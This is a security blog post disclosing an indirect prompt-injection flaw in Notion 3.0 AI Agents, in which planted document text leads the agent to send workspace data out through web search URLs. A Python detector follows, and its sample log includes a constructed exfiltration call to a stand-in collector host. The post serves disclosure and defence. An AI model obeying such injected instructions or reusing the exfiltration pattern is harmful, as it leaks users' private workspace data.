The Hidden Risk in Notion 3.0 AI Agents: Web Search Tool Abuse for Data Exfiltration

Abi Raghuram
Sep 19, 2025
Executive Summary
We discovered a critical security vulnerability in Notion 3.0's AI Agents that demonstrates how the combination of LLM agents, web search tool access, and long-term memory creates exploitable attack vectors for data exfiltration. This vulnerability allowed an attacker to extract sensitive workspace content by injecting malicious instructions into documents that the AI agent would later process.
The Attack Vector
Notion 3.0 introduced AI Agents capable of browsing the web, reading workspace content, and maintaining memory across sessions. This combination is powerful, but it also creates a classic indirect prompt injection surface: the agent reads workspace text as data, yet the underlying model may follow instructions embedded in that text.
An attacker who can place content in a Notion workspace can inject instructions that the AI agent will execute when processing that content. Combined with web search capabilities, those instructions can exfiltrate data to an attacker-controlled server.
Technical Details
The attack works in three stages:
1. **Injection**: A malicious prompt is embedded in a Notion document, database entry, or comment
2. **Retrieval**: Notion's AI agent processes that document as part of a legitimate task
3. **Exfiltration**: The injected instruction triggers a web search to an attacker-controlled URL, with sensitive data encoded in the query parameters
Impact
This vulnerability could allow an attacker with document access to:
- Extract content from other pages the AI has read
- Steal information from the agent's memory store
- Exfiltrate workspace-wide data during any AI-assisted task
Disclosure Timeline
We reported this vulnerability to Notion's security team and worked with them through responsible disclosure. This post is published following the patch rollout.
Defense Recommendations
Organizations using Notion 3.0 AI features should:
1. Audit which users can create content that AI agents will process
2. Monitor AI agent web search activity for anomalous patterns, such as requests to unexpected destination domains or unusually long or encoded query parameters
3. Implement data loss prevention controls on AI-generated outputs
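The exfiltration stage described above (sensitive data packed into query parameters of a search request to an attacker-controlled host) and the second recommendation (monitoring agent web search activity) both reduce to inspecting the web search tool call, either before the request leaves the agent or afterwards in the tool-call log. The following Python is an added example written for this post; it is not Notion's code or the researcher's. It assumes a hypothetical tool gateway that sees the full URL of every `web_search` call, an allowlist of permitted search hosts, and illustrative thresholds for parameter length and entropy. The log lines and the "stolen" page body are constructed sample data.

```python
import base64
import math
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

# Hypothetical policy values: assumptions for this example, not values from the post.
ALLOWED_HOSTS = {"www.google.com", "www.bing.com", "duckduckgo.com"}
MAX_PARAM_LEN = 200       # human-typed search queries are rarely this long
ENTROPY_THRESHOLD = 4.5   # bits per char; English text sits near 4, base64 blobs higher
BLOB_RE = re.compile(r"^[A-Za-z0-9_=-]{40,}$")   # url-safe base64 / hex-looking token


@dataclass
class Verdict:
    allowed: bool
    reasons: list = field(default_factory=list)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def inspect_search_call(url: str) -> Verdict:
    """Policy check a tool gateway would apply to a web_search URL before issuing it."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host not in allowlist: {host}")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(value) > MAX_PARAM_LEN:
            reasons.append(f"param {key!r} oversized ({len(value)} chars)")
        if BLOB_RE.match(value) and shannon_entropy(value) > ENTROPY_THRESHOLD:
            reasons.append(f"param {key!r} looks like an encoded blob")
    return Verdict(allowed=not reasons, reasons=reasons)


URL_RE = re.compile(r"\burl=(\S+)")


def triage_log(lines):
    """Retrospective view: return (line, verdict) for each logged search call that violates policy."""
    flagged = []
    for line in lines:
        m = URL_RE.search(line)
        if not m:
            continue  # not a web_search call (e.g. a page read)
        verdict = inspect_search_call(m.group(1))
        if not verdict.allowed:
            flagged.append((line, verdict))
    return flagged


# --- Constructed sample data: a fake agent tool-call log, not real Notion telemetry ---
# A fake "stolen" page body, base64-encoded the way an injected instruction might
# tell the agent to pack it into a query parameter.
FAKE_PAGE = (
    b"CONSTRUCTED SAMPLE - salary review notes: Alice 180k, Bob 165k, Carol 170k. "
    b"API key sk-example-000000000000000000000000 (fake, for illustration only). "
    b"Next-quarter hiring plan: two platform engineers, one security engineer, one PM."
)
EXFIL_BLOB = base64.urlsafe_b64encode(FAKE_PAGE).decode()
# 64 distinct url-safe base64 symbols: maximal entropy (6 bits/char) but under the length cap,
# so only the entropy check, not the length check, catches it.
SHORT_BLOB = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"

SAMPLE_LOG = [
    "2025-09-19T10:01:02Z agent=notion-ai tool=web_search url=https://www.google.com/search?q=Q3+roadmap+planning+template",
    f"2025-09-19T10:01:09Z agent=notion-ai tool=web_search url=https://collector.example.invalid/s?q={EXFIL_BLOB}",
    f"2025-09-19T10:02:30Z agent=notion-ai tool=web_search url=https://www.bing.com/search?q={SHORT_BLOB}",
    "2025-09-19T10:03:11Z agent=notion-ai tool=read_page page_id=constructed-0001",
]

if __name__ == "__main__":
    for line, verdict in triage_log(SAMPLE_LOG):
        print("BLOCK", line[:70] + "...")
        for reason in verdict.reasons:
            print("   -", reason)
```

`inspect_search_call` is the preventive control: placed in the tool layer, it refuses the request before any data leaves. `triage_log` is the same policy applied to the recorded calls, which is what recommendation 2 asks for. The third sample line shows why a host allowlist alone is not enough: an encoded blob sent through a permitted search engine still carries workspace content out, so the parameter length and entropy checks are what catch it.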